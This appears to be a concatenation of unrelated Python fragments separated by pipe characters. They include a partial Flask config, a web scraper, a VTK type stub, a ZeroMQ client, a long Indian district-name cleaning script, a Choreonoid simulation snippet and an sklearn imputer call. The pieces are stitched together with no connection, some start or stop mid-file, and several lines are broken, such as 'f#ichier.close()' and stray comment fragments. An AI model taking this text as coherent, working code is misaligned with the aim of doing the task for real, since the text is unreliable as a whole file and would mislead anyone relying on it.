DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DEV_DATABASE_URL') or \
'sqlite:///' + os.path.join(basedir, 'data-dev.sqlite')
config = {
'default' : ProductionConfig,
} |
import bs4
import re
import urllib.request
from urllib.request import Request, urlopen
#Url utilisée pour le scraping
url="https://www.monpetitgazon.com"
req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
web_byte = urlopen(req).read()
webpage = web_byte.decode('utf-8')
soup = bs4.BeautifulSoup(webpage, 'html.parser')
#fichier = open("MPGStats.txt", "w")
#t = soup.find(class_='index__root___1KIse')
#titre = t.h4.get_text()
#fichier.write(titre)
f#ichier.close() |
"""
This type stub file was generated by pyright.
"""
from .vtkObject import vtkObject
class vtkDebugLeaks(vtkObject):
"""
vtkDebugLeaks - identify memory leaks at program termination
vtkDebugLeaks is used to report memory leaks at the exit of the
program.
Superclass: vtkObject
It uses vtkObjectBase::InitializeObjectBase() (called via
vtkObjectFactory macros) to intercept the construction of all VTK
objects. It uses the UnRegisterInternal method of vtkObjectBase to
intercept the destruction of all objects.
If not using the vtkObjectFactory macros to implement New(), be sure
to call vtkObjectBase::InitializeObjectBase() explicitly on the
constructed instance. The rule of thumb is that wherever "new [some
vtkObjectBase subclass]" is called,
vtkObjectBase::InitializeObjectBase() must be called as well.
There are exceptions to this:
- vtkCommand subclasses traditionally do not fully participate in
vtkDebugLeaks registration, likely because they typically do not
use vtkTypeMacro to configure GetClassName. InitializeObjectBase
should not be called on vtkCommand subclasses, and all such classes
will be automatically registered with vtkDebugLeaks as "vtkCommand or
subclass".
- vtkInformationKey subclasses are not reference counted. They are
allocated statically and registered automatically with a singleton
"manager" instance. The manager ensures that all keys are cleaned
up before exiting, and registration/deregistration with
vtkDebugLeaks is bypassed.
A table of object name to number of instances is kept. At the exit of
the program if there are still VTK objects around it will print them
out. To enable this class add the flag -DVTK_DEBUG_LEAKS to the
compile line, and rebuild vtkObject and vtkObjectFactory.
"""
def ConstructClass(self, vtkObjectBase):
"""
V.ConstructClass(vtkObjectBase)
C++: static void ConstructClass(vtkObjectBase *object)
V.ConstructClass(string)
C++: static void ConstructClass(const char *className)
Call this when creating a class.
"""
...
def DestructClass(self, vtkObjectBase):
"""
V.DestructClass(vtkObjectBase)
C++: static void DestructClass(vtkObjectBase *object)
V.DestructClass(string)
C++: static void DestructClass(const char *className)
Call this when deleting a class.
"""
...
def GetExitError(self):
"""
V.GetExitError() -> int
C++: static int GetExitError()
Get/Set flag for exiting with an error when leaks are present.
Default is on when VTK_DEBUG_LEAKS is on and off otherwise.
"""
...
def GetNumberOfGenerationsFromBase(self, string):
"""
V.GetNumberOfGenerationsFromBase(string) -> int
C++: vtkIdType GetNumberOfGenerationsFromBase(const char *type)
override;
Given a the name of a base class of this class type, return the
distance of inheritance between this class type and the named
class (how many generations of inheritance are there between this
class and the named class). If the named class is not in this
class's inheritance tree, return a negative value. Valid
responses will always be nonnegative. This method works in
combination with vtkTypeMacro found in vtkSetGet.h.
"""
...
def GetNumberOfGenerationsFromBaseType(self, string):
"""
V.GetNumberOfGenerationsFromBaseType(string) -> int
C++: static vtkIdType GetNumberOfGenerationsFromBaseType(
const char *type)
Given a the name of a base class of this class type, return the
distance of inheritance between this class type and the named
class (how many generations of inheritance are there between this
class and the named class). If the named class is not in this
class's inheritance tree, return a negative value. Valid
responses will always be nonnegative. This method works in
combination with vtkTypeMacro found in vtkSetGet.h.
"""
...
def IsA(self, string):
"""
V.IsA(string) -> int
C++: vtkTypeBool IsA(const char *type) override;
Return 1 if this class is the same type of (or a subclass of) the
named class. Returns 0 otherwise. This method works in
combination with vtkTypeMacro found in vtkSetGet.h.
"""
...
def IsTypeOf(self, string):
"""
V.IsTypeOf(string) -> int
C++: static vtkTypeBool IsTypeOf(const char *type)
Return 1 if this class type is the same type of (or a subclass
of) the named class. Returns 0 otherwise. This method works in
combination with vtkTypeMacro found in vtkSetGet.h.
"""
...
def NewInstance(self):
"""
V.NewInstance() -> vtkDebugLeaks
C++: vtkDebugLeaks *NewInstance()
"""
...
def PrintCurrentLeaks(self):
"""
V.PrintCurrentLeaks() -> int
C++: static int PrintCurrentLeaks()
Print all the values in the table. Returns non-zero if there
were leaks.
"""
...
def SafeDownCast(self, vtkObjectBase):
"""
V.SafeDownCast(vtkObjectBase) -> vtkDebugLeaks
C++: static vtkDebugLeaks *SafeDownCast(vtkObjectBase *o)
"""
...
def SetExitError(self, p_int):
"""
V.SetExitError(int)
C++: static void SetExitError(int)
Get/Set flag for exiting with an error when leaks are present.
Default is on when VTK_DEBUG_LEAKS is on and off otherwise.
"""
...
def __delattr__(self, *args, **kwargs):
""" Implement delattr(self, name). """
...
def __getattribute__(self, *args, **kwargs):
""" Return getattr(self, name). """
...
def __init__(self, *args, **kwargs) -> None:
...
@staticmethod
def __new__(*args, **kwargs):
""" Create and return a new object. See help(type) for accurate signature. """
...
def __repr__(self, *args, **kwargs):
""" Return repr(self). """
...
def __setattr__(self, *args, **kwargs):
""" Implement setattr(self, name, value). """
...
def __str__(self, *args, **kwargs) -> str:
""" Return str(self). """
...
__this__ = ...
__dict__ = ...
__vtkname__ = ...
|
# -*- coding: utf-8 -*-
import logging
import zmq
class AdhsClient(object):
def __init__(self):
self.logger = logging.getLogger(self.__class__.__name__)
self._active_servers = []
self.context = zmq.Context()
self.requester = self.context.socket(zmq.REQ)
self.requester.set(zmq.RCVTIMEO, 250)
self.requester.set(zmq.SNDTIMEO, 1000)
self.requester.set(zmq.IMMEDIATE, 1)
def connectToServer(self, server='tcp://localhost:14005'):
self.logger.info('connecting to %s', server)
self.requester.connect(server)
self._active_servers.append(server)
def active_servers(self):
'''Get the list of active servers'''
return self._active_servers
def get(self, key):
if len(self._active_servers) == 0:
raise KeyError
self.requester.send_multipart(['GET', key])
msg = self.requester.recv_multipart()
if msg[0] != 'OK':
raise KeyError
return msg[2]
def save(self, key, value):
if len(self._active_servers) == 0:
raise ValueError
self.requester.send_multipart(['SAVE', key, value])
status, key, value = self.requester.recv_multipart()
self.logger.info(
'Status %s for saving key %s with value \'%s\'',
status, key, value
)
def has_key(self, key):
if len(self._active_servers) > 0:
self.requester.send_multipart(['EXISTS', key])
msg = self.requester.recv_multipart()
if msg[0] == 'OK':
return True
return False
def delete(self, key):
if len(self._active_servers) > 0:
self.requester.send_multipart(['DELETE', key])
msg = self.requester.recv_multipart()
if msg[0] == 'OK':
return True
return False
|
import json
with open('neighbor-districts.json') as f:
data = json.load(f)
f.close()
assam_districts = {'c': 'as', 'd' : ['baksa','barpeta','bishwanath','bongaigaon','cachar','charaideo','chirang','darrang','dhemaji',
'dhubri','dibrugarh', 'dima hasao', 'goalpara', 'golaghat', 'hailakandi', 'hojai', 'jorhat','kamrup metropolitan',
'kamrup', 'east karbi anglong', 'karimganj','kokrajhar','lakhimpur','majuli','morigaon','nagaon','nalbari','sivasagar',
'sonitpur','south salmara mankachar','tinsukia','udalguri','west karbi anglong'] }
manipur_districts ={ 'c':'mn', 'd' : ['bishnupur','chandel','churachandpur','imphal east','imphal west','jiribam','kakching','kamjong',
'kangpokpi','noney','pherzawl','senapati','tamenglong','tengnoupal','thoubal','ukhrul'] }
sikkim_districts = {'c':'sk' , 'd': ['east sikkim', 'north sikkim','south sikkim','west sikkim'] }
telangana_districts = {'c':'tg', 'd': ['bhadradri kothagudem','hyderabad','jagtial','jangaon','jayashankar bhupalapally',
'jogulamba gadwal', 'kamareddy','karimnagar','khammam','komram bheem','mahabubabad','mahabubnagar','mancherial',
'medak','medchal malkajgiri','mulugu','nagarkurnool','nalgonda','narayanpet','nirmal','nizamabad','peddapalli',
'rajanna sircilla','ranga reddy','sangareddy','siddipet','suryapet','vikarabad','wanaparthy','warangal rural',
'warangal urban','yadadri bhuvanagiri'] }
goa_districts = {'c':'ga', 'd': ['north goa', 'south goa'] }
#data cleaning
qd = "Q987" #for delhi
data = {key.replace("_district",''):value for key,value in data.items()} #remove suffix '_district'
for key,value in list(data.items()):
for x in range(len(value)):
if("_district" in value[x]):
sub = value[x].split("_district")
value[x] = sub[0]+sub[1]
if(value[x].startswith("ri-bhoi")):
value[x] = value[x].replace("-",'')
if("-" in value[x]):
sub = value[x].split("-")
value[x] = sub[0]+" "+sub[1]
elif("delhi" in value[x] or 'shahdara' in value[x]):
value[x] = "delhi/"+qd
elif(value[x] == "bijapur/Q1727570"):
value[x] = "vijayapura/Q1727570"
elif(value[x] == "bijapur/Q100164"):
continue
elif("pashchimi" in value[x]):
value[x] = value[x].replace("pashchimi", "west")
elif("pashchim" in value[x]):
value[x] = value[x].replace("pashchim", "west")
elif("purba" in value[x] and "medinipur" not in value[x] and 'bardhaman' not in value[x]):
value[x] = value[x].replace("purba", "east")
elif("purbi" in value[x] ):
value[x] = value[x].replace("purbi", "east")
elif(value[x].startswith('nav_sari')):
value[x] = value[x].replace('_', '')
continue
elif(value[x].startswith('rae_bareilly')):
sub = value[x].split("/")
value[x] = 'rae bareli/'+sub[1]
elif(value[x].startswith('panch_mahal')):
value[x] = value[x].replace('_', '')
continue
elif(value[x].startswith('sabar')):
value[x] = value[x].replace('_', '')
continue
elif(value[x].startswith('sait')):
sub = value[x].split("/")
value[x] = "sant kabir nagar/"+sub[1]
continue
elif(value[x].startswith('seraikela_kharsawan')):
sub = value[x].split("/")
value[x] = "saraikela-kharsawan/"+sub[1]
continue
elif(value[x].startswith('shaheed_bhagat')):
sub = value[x].split("/")
value[x] = "shahid bhagat singh nagar/"+sub[1]
continue
elif(value[x].startswith('siddharth')):
sub = value[x].split("/")
value[x] = "siddharthnagar/"+sub[1]
continue
elif(value[x].startswith('sri_potti_sriramulu_nellore')):
sub = value[x].split("/")
value[x] = 's.p.s. nellore/'+sub[1]
continue
elif(value[x].startswith('the_dangs')):
sub = value[x].split("/")
value[x] = 'dang/'+sub[1]
continue
elif(value[x].startswith('ambedkar')):
sub = value[x].split("/")
value[x] = 'ambedkar nagar/'+sub[1]
elif(value[x].startswith('ashok')):
sub = value[x].split("/")
value[x] = 'ashoknagar/'+sub[1]
elif(value[x].startswith('banas')):
sub = value[x].split("/")
value[x] = 'banaskantha/'+sub[1]
elif(value[x].startswith('bangalore_rural')):
sub = value[x].split("/")
value[x] = 'bengaluru rural/'+sub[1]
elif(value[x].startswith('bangalore_urban')):
sub = value[x].split("/")
value[x] = 'bengaluru urban/'+sub[1]
elif(value[x].startswith('devbhumi_dwaraka')):
sub = value[x].split("/")
value[x] = 'devbhumi dwarka/'+sub[1]
elif(value[x].startswith('fategarh_sahib')):
sub = value[x].split("/")
value[x] = 'fatehgarh sahib/'+sub[1]
elif(value[x].startswith('jyotiba')):
sub = value[x].split("/")
value[x] = 'amroha/'+sub[1]
elif(value[x].startswith('kaimur')):
sub = value[x].split("/")
value[x] = 'kaimur/'+sub[1]
elif(value[x].startswith('sahibzada_ajit_singh_nagar')):
sub = value[x].split("/")
value[x] = 's.a.s. nagar/'+sub[1]
if("_" in value[x]):
sub = value[x].split("_",-1)
if(len(sub)==2):
value[x] = sub[0]+" "+sub[1]
elif(len(sub)==3):
value[x] = sub[0]+" "+sub[1]+" "+sub[2]
elif(len(sub)==4):
value[x] = sub[0]+" "+sub[1]+" "+sub[2]+" "+sub[3]
if("the" in value[x]):
value[x] = value[x].replace("the ","")
sub = value[x].split("/")
if(sub[0]=="anugul"):
value[x] = "angul/"+sub[1]
elif(sub[0]=='aizwal'):
value[x] = "aizawl/"+sub[1]
elif(value[x].startswith("ashok")):
value[x] = value[x].replace("_",'')
elif(sub[0]=='badgam'):
value[x] = "budgam/"+sub[1]
elif(value[x].startswith("baloda")):
value[x]=value[x].replace("_",' ')
elif(value[x].startswith("banas")):
value[x]=value[x].replace("_",'')
elif(sub[0]=='baramula'):
value[x] = "baramulla/"+sub[1]
elif(sub[0]=='baudh'):
value[x] = "boudh/"+sub[1]
elif(sub[0]=='bellary'):
value[x] = "ballari/"+sub[1]
elif(sub[0]=='chamarajanagar'):
value[x] = 'chamarajanagara/'+sub[1]
elif(sub[0]=='charkhi_dadri'):
value[x] = 'charkhi dadri/'+sub[1]
elif(sub[0]== 'dakshina_kannada'):
value[x] = 'dakshina kannada/'+sub[1]
elif(sub[0]== 'dantewada'):
value[x] = 'dakshin bastar dantewada/'+sub[1]
elif(sub[0]== 'dhaulpur'):
value[x] = 'dholpur/'+sub[1]
elif(sub[0]=='firozpur'):
value[x] = 'ferozepur/'+sub[1]
elif(sub[0]=='gondiya'):
value[x] = 'gondia/'+sub[1]
elif(sub[0]=='jagatsinghapur'):
value[x] = 'jagatsinghpur/'+sub[1]
elif(sub[0]=='jajapur'):
value[x] = 'jajpur/'+sub[1]
elif(sub[0]=='jalor'):
value[x] = 'jalore/'+sub[1]
elif(sub[0]=='kanchipuram'):
value[x] = 'kancheepuram/'+sub[1]
elif(sub[0]=='kheri'):
value[x] = 'lakhimpur kheri/'+sub[1]
elif(sub[0]=='kochbihar'):
value[x] = 'cooch behar/'+sub[1]
elif(sub[0]=='kodarma'):
value[x] = 'koderma/'+sub[1]
elif(sub[0]=='lahul and spiti'):
value[x] = 'lahaul and spiti/'+sub[1]
elif(sub[0]=='mahesana'):
value[x] = 'mehsana/'+sub[1]
elif(sub[0]=='mahrajganj'):
value[x] = 'maharajganj/'+sub[1]
elif(sub[0]=='maldah'):
value[x] = 'malda/'+sub[1]
elif(sub[0]=='marigaon'):
value[x] = 'morigaon/'+sub[1]
elif(sub[0]=='muktsar'):
value[x] = 'sri muktsar sahib/'+sub[1]
elif(sub[0]=='mumbai city'):
value[x] = 'mumbai/'+sub[1]
elif(sub[0]=='nandubar'):
value[x] = 'nandurbar/'+sub[1]
elif(sub[0]=='narsimhapur'):
value[x] = 'narsinghpur/'+sub[1]
elif(sub[0]=='pakaur'):
value[x] = 'pakur/'+sub[1]
elif(sub[0]=='palghat'):
value[x] = 'palakkad/'+sub[1]
elif(sub[0]=='pattanamtitta'):
value[x] = 'pathanamthitta/'+sub[1]
elif(sub[0]=='puruliya'):
value[x] = 'purulia/'+sub[1]
elif(sub[0]=='rajauri'):
value[x] = 'rajouri/'+sub[1]
elif(sub[0]=='rangareddy'):
value[x] = 'ranga reddy/'+sub[1]
elif(value[x].startswith("sant ravidas")):
value[x] = 'bhadohi/'+sub[1]
elif(sub[0]=='sepahijala'):
value[x] = 'sipahijala/'+sub[1]
elif(sub[0]=='sharawasti'):
value[x] = 'shrawasti/'+sub[1]
elif(sub[0]=='shimoga'):
value[x] = 'shivamogga/'+sub[1]
elif(sub[0]=='shopian'):
value[x] = 'shopiyan/'+sub[1]
elif(sub[0]=='sivagangai'):
value[x] = 'sivaganga/'+sub[1]
elif(value[x].startswith('sri ganganagar')):
value[x] = 'ganganagar/'+sub[1]
elif(value[x].startswith('thoothukudi')):
value[x] = 'thoothukkudi/'+sub[1]
elif(value[x].startswith('tiruchchirappalli')):
value[x] = 'tiruchirappalli/'+sub[1]
elif(value[x].startswith('tirunelveli')):
value[x] = 'tirunelveli/'+sub[1]
elif(value[x].startswith('tiruvanamalai')):
value[x] = 'tiruvannamalai/'+sub[1]
elif(value[x].startswith('tumkur')):
value[x] = 'tumakuru/'+sub[1]
elif(value[x].startswith('yadagiri')):
value[x] = 'yadgir/'+sub[1]
elif(value[x].startswith('ysr')):
value[x] = 'y.s.r. kadapa/'+sub[1]
elif(value[x].startswith('baleshwar')):
value[x] = 'balasore/'+sub[1]
elif(value[x].startswith('belgaum')):
value[x] = 'belagavi/'+sub[1]
elif(value[x].startswith('debagarh')):
value[x] = 'deogarh/'+sub[1]
elif(value[x].startswith('faizabad')):
value[x] = 'ayodhya/'+sub[1]
elif(sub[0]=='bid'):
value[x] = 'beed/'+sub[1]
elif(value[x].startswith('hugli')):
value[x] = 'hooghly/'+sub[1]
elif(value[x].startswith('jhunjhunun')):
value[x] = 'jhunjhunu/'+sub[1]
elif(value[x].startswith('bemetara')):
value[x] = 'bametara/'+sub[1]
elif(value[x].startswith('kabirdham')):
value[x] = 'kabeerdham/'+sub[1]
elif(value[x].startswith('sonapur')):
value[x] = 'subarnapur/'+sub[1]
# elif(sub[0].startswith("east")):
# sub1 = sub[0].split("_",-1)
# if(len(sub1)==2):
# value[x] = "east "+sub1[1]+"/"+sub[1]
# elif(len(sub1)==3):
# value[x] = "east "+sub1[1]+' '+sub1[2]+"/"+sub[1]
elif(sub[0].endswith("east")):
sub1 = sub[0].split("_",-1)
if(len(sub1)==2):
value[x] = sub1[0]+" east"+"/"+sub[1]
elif(sub[0].endswith("west")):
sub1 = sub[0].split("_",-1)
if(len(sub1)==2):
value[x] = sub1[0]+" west"+"/"+sub[1]
sub=key.split("/")
if(key.startswith("south_salmara-mankachar")):
data["south salmara mankachar/"+sub[1]] = data.pop(key)
elif('delhi' in key or key.startswith('shahdara')):
data['delhi/'+qd] = data.pop(key)
elif(key == "bijapur/Q1727570"):
data["vijayapura/Q1727570"] = data.pop(key)
elif(key == "bijapur/Q100164"):
continue
elif(key.startswith("lahul_and_spiti")):
data["lahaul and spiti/"+sub[1]] = data.pop(key)
elif(key.startswith("mumbai_city")):
data["mumbai/"+sub[1]] = data.pop(key)
elif(key.startswith("nav_sari")):
data["navsari/"+sub[1]] = data.pop(key)
elif(key.startswith("panch_mahal")):
data["panchmahal/"+sub[1]] = data.pop(key)
elif(key.startswith("rae_bareilly")):
data["rae bareli/"+sub[1]] = data.pop(key)
elif(key.startswith("ri-bhoi")):
data['ribhoi/'+sub[1]] = data.pop(key)
elif(key.startswith("sabar")):
data["sabarkantha/"+sub[1]] = data.pop(key)
elif(key.startswith("sait")):
data["sant kabir nagar/"+sub[1]] = data.pop(key)
elif(key.startswith("sant_ravidas")):
data["bhadohi/"+sub[1]] = data.pop(key)
elif(key.startswith("sepahijala")):
data["sipahijala/"+sub[1]] = data.pop(key)
elif(key.startswith("seraikela_kharsawan")):
data["saraikela-kharsawan/"+sub[1]] = data.pop(key)
elif(key.startswith("shaheed_bhagat")):
data["shahid bhagat singh nagar/"+sub[1]] = data.pop(key)
elif(key.startswith("siddharth")):
data["siddharthnagar/"+sub[1]] = data.pop(key)
elif(key.startswith("sri_ganganagar")):
data["ganganagar/"+sub[1]] = data.pop(key)
elif(key.startswith("sri_potti_sriramulu_nellore")):
data["s.p.s. nellore/"+sub[1]] = data.pop(key)
elif(key.startswith("the_dangs")):
data["dang/"+sub[1]] = data.pop(key)
elif(key.startswith("tirunelveli")):
data["tirunelveli/"+sub[1]] = data.pop(key)
elif(key.startswith("ambedkar")):
data["ambedkar nagar/"+sub[1]] = data.pop(key)
elif(key.startswith("ashok")):
data["ashoknagar/"+sub[1]] = data.pop(key)
elif(key.startswith("banas")):
data["banaskantha/"+sub[1]] = data.pop(key)
elif(key.startswith("bangalore_rural")):
data["bengaluru rural/"+sub[1]] = data.pop(key)
elif(key.startswith("bangalore_urban")):
data["bengaluru urban/"+sub[1]] = data.pop(key)
elif(key.startswith("devbhumi_dwaraka")):
data["devbhumi dwarka/"+sub[1]] = data.pop(key)
elif(key.startswith("fategarh_sahib")):
data["fatehgarh sahib/"+sub[1]] = data.pop(key)
elif(key.startswith("jyotiba")):
data["amroha/"+sub[1]] = data.pop(key)
elif(key.startswith("kaimur")):
data["kaimur/"+sub[1]] = data.pop(key)
elif(key.startswith('sahibzada_ajit_singh_nagar')):
data["s.a.s. nagar/"+sub[1]] = data.pop(key)
elif("-" in key):
sub=key.split('-')
data[sub[0]+' '+sub[1]] = data.pop(key)
elif("the_" in key):
sub = key.split("the_")
data[sub[1]]=data.pop(key)
elif("pashchimi" in key):
sub=key.split('pashchimi_')
data["west "+sub[1]] = data.pop(key)
elif("pashchim" in key):
sub=key.split('pashchim_')
data["west "+sub[1]] = data.pop(key)
elif("purba" in key and "medinipur" not in key and 'bardhaman' not in key):
sub=key.split('purba_')
data["east "+sub[1]] = data.pop(key)
elif("purbi" in key):
sub=key.split('purbi_')
data["east "+sub[1]] = data.pop(key)
elif("_" in key):
sub = key.split("_", -1)
if(len(sub)==2):
data[sub[0]+" "+sub[1]] = data.pop(key)
elif(len(sub)==3):
data[sub[0]+" "+sub[1]+" "+sub[2]] = data.pop(key)
elif(len(sub)==4):
data[sub[0]+" "+sub[1]+" "+sub[2]+" "+sub[3]] = data.pop(key)
sub = key.split("/")
if(key.startswith("anugul")):
data["angul/"+sub[1]] = data.pop(key)
elif(key.startswith('badgam')):
data["budgam/"+sub[1]] = data.pop(key)
elif(key.startswith("aizwal")):
data["aizawl/"+sub[1]] = data.pop(key)
elif(key.startswith("baramula")):
data["baramulla/"+sub[1]] = data.pop(key)
elif(key.startswith("baudh")):
data["boudh/"+sub[1]] = data.pop(key)
elif(key.startswith("bellary")):
data["ballari/"+sub[1]] = data.pop(key)
elif(key.startswith("chamarajanagar")):
data["chamarajanagara/"+sub[1]] = data.pop(key)
elif(key.startswith("dantewada")):
data["dakshin bastar dantewada/"+sub[1]] = data.pop(key)
elif(key.startswith("dhaulpur")):
data["dholpur/"+sub[1]] = data.pop(key)
elif(key.startswith("firozpur")):
data["ferozepur/"+sub[1]] = data.pop(key)
elif(key.startswith("gondiya")):
data["gondia/"+sub[1]] = data.pop(key)
elif(key.startswith("jagatsinghapur")):
data["jagatsinghpur/"+sub[1]] = data.pop(key)
elif(key.startswith("jajapur")):
data["jajpur/"+sub[1]] = data.pop(key)
elif(key.startswith("jalor")):
data["jalore/"+sub[1]] = data.pop(key)
elif(key.startswith("kanchipuram")):
data["kancheepuram/"+sub[1]] = data.pop(key)
elif(key.startswith("kheri")):
data["lakhimpur kheri/"+sub[1]] = data.pop(key)
elif(key.startswith("kochbihar")):
data["cooch behar/"+sub[1]] = data.pop(key)
elif(key.startswith("kodarma")):
data["koderma/"+sub[1]] = data.pop(key)
elif(key.startswith("mahrajganj")):
data["maharajganj/"+sub[1]] = data.pop(key)
elif(key.startswith("maldah")):
data["malda/"+sub[1]] = data.pop(key)
elif(key.startswith("marigaon")):
data["morigaon/"+sub[1]] = data.pop(key)
elif(key.startswith("muktsar")):
data["sri muktsar sahib/"+sub[1]] = data.pop(key)
elif(key.startswith("nandubar")):
data["nandurbar/"+sub[1]] = data.pop(key)
elif(key.startswith("narsimhapur")):
data["narsinghpur/"+sub[1]] = data.pop(key)
elif(key.startswith("pakaur")):
data["pakur/"+sub[1]] = data.pop(key)
elif(key.startswith("palghat")):
data["palakkad/"+sub[1]] = data.pop(key)
elif(key.startswith("pattanamtitta")):
data["pathanamthitta/"+sub[1]] = data.pop(key)
elif(key.startswith("puruliya")):
data["purulia/"+sub[1]] = data.pop(key)
elif(key.startswith("rajauri")):
data["rajouri/"+sub[1]] = data.pop(key)
elif(key.startswith("rangareddy")):
data["ranga reddy/"+sub[1]] = data.pop(key)
elif(key.startswith("sharawasti")):
data["shrawasti/"+sub[1]] = data.pop(key)
elif(key.startswith("shimoga")):
data["shivamogga/"+sub[1]] = data.pop(key)
elif(key.startswith("shopian")):
data["shopiyan/"+sub[1]] = data.pop(key)
elif(key.startswith("sivagangai")):
data["sivaganga/"+sub[1]] = data.pop(key)
elif(key.startswith("thoothukudi")):
data["thoothukkudi/"+sub[1]] = data.pop(key)
elif(key.startswith("tiruchchirappalli")):
data["tiruchirappalli/"+sub[1]] = data.pop(key)
elif(key.startswith("tiruvanamalai")):
data["tiruvannamalai/"+sub[1]] = data.pop(key)
elif(key.startswith("tumkur")):
data["tumakuru/"+sub[1]] = data.pop(key)
elif(key.startswith("yadagiri")):
data["yadgir/"+sub[1]] = data.pop(key)
elif(key.startswith("ysr")):
data["y.s.r. kadapa/"+sub[1]] = data.pop(key)
elif(key.startswith("baleshwar")):
data["balasore/"+sub[1]] = data.pop(key)
elif(key.startswith("belgaum")):
data["belagavi/"+sub[1]] = data.pop(key)
elif(key.startswith("debagarh")):
data["deogarh/"+sub[1]] = data.pop(key)
elif(key.startswith("faizabad")):
data["ayodhya/"+sub[1]] = data.pop(key)
elif(key=="bid/Q814037"):
data["beed/"+sub[1]] = data.pop(key)
elif(key.startswith("hugli")):
data["hooghly/"+sub[1]] = data.pop(key)
elif(key.startswith("jhunjhunun")):
data["jhunjhunu/"+sub[1]] = data.pop(key)
elif(key.startswith("mahesana")):
data["mehsana/"+sub[1]] = data.pop(key)
elif(key.startswith("bemetara")):
data["bametara/"+sub[1]] = data.pop(key)
elif(key.startswith("kabirdham")):
data["kabeerdham/"+sub[1]] = data.pop(key)
elif(key.startswith("sonapur")):
data["subarnapur/"+sub[1]] = data.pop(key)
if('konkan division/Q6268840' in data.keys()):
data.pop('konkan division/Q6268840',None)
if('noklak/Q48731903' in data.keys()):
data.pop('noklak/Q48731903',None)
if("mumbai suburban/Q2085374" in data.keys()):
data['mumbai/Q2341660'] = data.pop("mumbai suburban/Q2085374",None)
data.pop("mumbai suburban/Q2085374",None)
if("adilabad/Q15211" in data.keys()):
data.pop("adilabad/Q15211",None)
if("komram bheem/Q28170184" in data.keys()):
data.pop("komram bheem/Q28170184",None)
if("nirmal/Q28169750" in data.keys()):
data.pop("nirmal/Q28169750",None)
if("north goa/Q108234" in data.keys()):
data.pop("north goa/Q108234",None)
data2 = data.copy()
for key,value in data2.items():
sub = key.split("/")
if(sub[0] in assam_districts['d']):
data['unknown_'+assam_districts['c']] = data.pop(key,None)
elif(sub[0] in manipur_districts['d']):
data['unknown_'+manipur_districts['c']] = data.pop(key,None)
elif(sub[0] in goa_districts['d']):
data['unknown_'+goa_districts['c']] = data.pop(key,None)
elif(sub[0] in sikkim_districts['d']):
data['unknown_'+sikkim_districts['c']] = data.pop(key,None)
elif(sub[0] in telangana_districts['d']):
data['unknown_'+telangana_districts['c']] = data.pop(key,None)
if('noklak/Q48731903' in value):
value = list(filter(lambda x: x!= 'noklak/Q48731903' , value))
data[key] = value
if('konkan division/Q6268840' in value):
value = list(filter(lambda x: x!= 'konkan division/Q6268840' , value))
data[key] = value
if('mumbai suburban/Q2085374' in value):
value = list(filter(lambda x: x!= 'mumbai suburban/Q2085374' , value))
data[key] = value
if('adilabad/Q15211' in value):
value = list(filter(lambda x: x!= 'adilabad/Q15211' , value))
data[key] = value
for x in value:
sub1 = x.split("/")
if(sub1[0] in assam_districts['d']):
value = list(filter(lambda x1: x1!= x , value))
if('unknown_'+assam_districts['c'] not in data.keys()):
data['unknown_'+assam_districts['c']] = value
else:
data['unknown_'+assam_districts['c']]+=value
elif(sub1[0] in manipur_districts['d']):
value = list(filter(lambda x1: x1!= x , value))
if('unknown_'+manipur_districts['c'] not in data.keys()):
data['unknown_'+manipur_districts['c']] = value
else:
data['unknown_'+manipur_districts['c']]+=value
elif(sub1[0] in goa_districts['d']):
value = list(filter(lambda x1: x1!= x , value))
if('unknown_'+goa_districts['c'] not in data.keys()):
data['unknown_'+goa_districts['c']] = value
else:
data['unknown_'+goa_districts['c']]+=value
elif(sub1[0] in sikkim_districts['d']):
value = list(filter(lambda x1: x1!= x , value))
if('unknown_'+sikkim_districts['c'] not in data.keys()):
data['unknown_'+sikkim_districts['c']] = value
else:
data['unknown_'+sikkim_districts['c']]+=value
elif(sub1[0] in telangana_districts['d']):
value = list(filter(lambda x1: x1!= x , value))
if('unknown_'+telangana_districts['c'] not in data.keys()):
data['unknown_'+telangana_districts['c']] = value
else:
data['unknown_'+telangana_districts['c']]+=value
for key, value in data.items():
for x in range(len(value)):
sub = value[x].split("/")
if(sub[0] in assam_districts['d']):
value[x] = value[x].replace(value[x],'unknown_'+assam_districts['c'])
elif(sub[0] in sikkim_districts['d']):
value[x] = value[x].replace(value[x],'unknown_'+sikkim_districts['c'])
elif(sub[0] in goa_districts['d']):
value[x] = value[x].replace(value[x],'unknown_'+goa_districts['c'])
elif(sub[0] in manipur_districts['d']):
value[x] = value[x].replace(value[x],'unknown_'+manipur_districts['c'])
elif(sub[0] in telangana_districts['d']):
value[x] = value[x].replace(value[x],'unknown_'+telangana_districts['c'])
if(key in value):
value = list(filter(lambda x: x!= key, value)) #remove occurrence of key in value (eg. Delhi)
data[key] = value
if(len(value) == len(set(value))):
data[key] = value
else:
data[key] = list(set(value))
for key, value in data.items():
for x in range(len(value)):
if(value[x]== "unknown_sk"):
data['unknown_sk'].append(key)
if(value[x] == "unknown_mn"):
data['unknown_mn'].append(key)
if(value[x] == "unknown_tg"):
data['unknown_tg'].append(key)
with open("neighbor-districts-modified.json", "w") as outfile:
json.dump(data, outfile, indent = 2, sort_keys=True)
outfile.close()
f=open("neighbor-districts-modified.json")
data = json.load(f)
f.close()
i=101
for key, value in data.items():
data[key] = {'id':i, 'neighbors': value}
i+=1
with open("neighbor-districts-modified.json", "w") as outfile:
json.dump(data, outfile, indent = 2, sort_keys=True)
outfile.close()
# airport quarantine
# bsf camp
# capf personnel
# chengalpattu
# evacuees
# foreign evacuees
# gaurela pendra marwahi
# hnahthial
# italians
# khawzawl
# lakshadweep
# mirpur
# muzaffarabad
# nicobars
# north and middle andaman
# other region
# other state
# others
# railway quarantine
# ranipet
# saitual
# south andaman
# tenkasi
# tirupathur
# unassigned
# unknown
# yanam
#Common Names
# hamirpur
-> UP, HP
# pratapgarh -> UP, RJ
#
balrampur ->UP, CT
#
aurangabad -> MH, BR
#
bilaspur -> CT, HP |
from cnoid.Base import *
from cnoid.BodyPlugin import *
sr1 = Item.find("SR1").body()
floorLink = Item.find("Floor").body().rootLink()
simulator = Item.find("AISTSimulator")
handler = simulator.collisionHandlerId()
simulator.setCollisionHandler(sr1.link("LLEG_ANKLE_R"), floorLink, handler)
simulator.setCollisionHandler(sr1.link("RLEG_ANKLE_R"), floorLink, handler)
|
from sklearn.preprocessing import Imputer
impute = Imputer(missing_values = 0, strategy='mean', axis=0)
impute.fit_transform(X_train) |
import pandas
import wget
